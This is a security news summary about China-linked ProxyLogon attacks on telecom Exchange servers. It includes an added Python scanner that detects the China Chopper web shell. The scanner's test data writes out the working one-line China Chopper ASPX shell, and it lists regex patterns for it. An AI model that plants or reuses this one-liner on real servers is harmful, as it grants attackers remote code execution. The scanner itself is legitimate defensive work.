‘DeadRinger’ Targeted Exchange Servers Long Before Discovery (Security News, August 2021)
Threat actors linked to China exploited the notorious Microsoft Exchange ProxyLogon vulnerabilities long before they were publicly disclosed, in attacks against telecommunications companies aimed at stealing sensitive customer data and maintaining network persistence, researchers have found.
The threat actors used tactics similar to those seen in the Hafnium zero-day attacks, which were recently blamed on China and condemned by the White House, and which exploited the ProxyLogon vulnerabilities in Microsoft Exchange servers to gain access to targeted networks, according to the report.
Overall, the attacks show an aggressive assault by China on the security of critical infrastructure that, much like the SolarWinds and Kaseya attacks, compromises third-party service providers in order to reach their customers, undermining those trust relationships and causing other collateral damage, Cybereason CEO and co-founder Lior Div said.
These attackers leverage Microsoft Exchange vulnerabilities to install the China Chopper web shell, then gain a foothold using the PcShare backdoor.
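The China Chopper ASPX variant is one of the most recognisable web shells: a single line consisting of a Jscript page directive and an eval() over a request parameter. The scanner below is an added example for defenders, not code from the Threatpost report or from Cybereason's research; it walks a directory of IIS-served script files and flags those matching the publicly documented one-liner. The OWA-like folder layout and the file contents are constructed test data, and the indicator names are this example's own.

```python
import re
import tempfile
from pathlib import Path

# Indicators for the publicly documented China Chopper ASPX one-liner:
# a Jscript page directive followed by eval(Request.Item[...], "unsafe").
# Case-insensitive and tolerant of whitespace/quote variations.
INDICATORS = {
    "jscript_page_directive": re.compile(
        r'<%@\s*Page\s+Language\s*=\s*["\']Jscript["\']', re.I),
    "eval_request_item_unsafe": re.compile(
        r'eval\s*\(\s*Request\.Item\s*\[[^\]]*\]\s*,\s*["\']unsafe["\']', re.I),
}

# Extensions IIS executes server-side; static assets (.css/.js) are not scanned
# because their contents are never run by the server.
SCRIPT_SUFFIXES = {".aspx", ".asp", ".ashx", ".asmx"}


def scan_file(path: Path) -> list[str]:
    """Return the indicator names matched in one file ([] if clean or unreadable)."""
    try:
        text = path.read_text(errors="ignore")
    except OSError:
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def scan_tree(root: Path) -> dict[str, list[str]]:
    """Recursively scan root; return {relative_path: indicators} for files that matched."""
    findings = {}
    for p in root.rglob("*"):
        if p.is_file() and p.suffix.lower() in SCRIPT_SUFFIXES:
            hits = scan_file(p)
            if hits:
                findings[p.relative_to(root).as_posix()] = hits
    return findings


def build_sample_tree() -> Path:
    """Constructed test data: a folder shaped like an OWA auth directory holding one
    benign page, one file shaped like the China Chopper one-liner, and one static
    file that contains the same text but is never executed by IIS."""
    root = Path(tempfile.mkdtemp(prefix="owa_sample_"))
    auth = root / "owa" / "auth"
    auth.mkdir(parents=True)
    (auth / "logon.aspx").write_text(
        '<%@ Page Language="C#" AutoEventWireup="true" %>\n'
        '<html><body><form runat="server">Sign in</form></body></html>\n')
    # Hypothetical dropped file name; the body is the well-known one-liner shape.
    (auth / "dropped_sample.aspx").write_text(
        '<%@ Page Language="Jscript"%>'
        '<%eval(Request.Item["password"],"unsafe");%>\n')
    (auth / "logon.css").write_text('eval(Request.Item["x"],"unsafe")\n')
    return root


def demo() -> dict[str, list[str]]:
    """Scan the constructed tree; only dropped_sample.aspx should be reported."""
    return scan_tree(build_sample_tree())


if __name__ == "__main__":
    for rel, hits in demo().items():
        print(f"{rel}: {', '.join(hits)}")
```

Point scan_tree at the Exchange FrontEnd\HttpProxy and ClientAccess directories (or any IIS web root) to triage a suspected server; a match on eval_request_item_unsafe alone is strong enough to warrant pulling the file and the IIS logs for that URL, while the Jscript directive alone is weak and is reported only as supporting context.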
Researchers still don't know how Naikon APT initially compromises its targeted networks, but they have observed the group using the Nebulae backdoor and other tools to perform activities similar to SoftCell's once it gains a foothold.
The attacks also might be the work of Chinese APT Group-3390, given the use of a "unique OWA backdoor" deployed across multiple Microsoft Exchange and IIS servers.
News URL: https://threatpost.com/deadringer-targeted-exchange-servers-before-discovery/168300/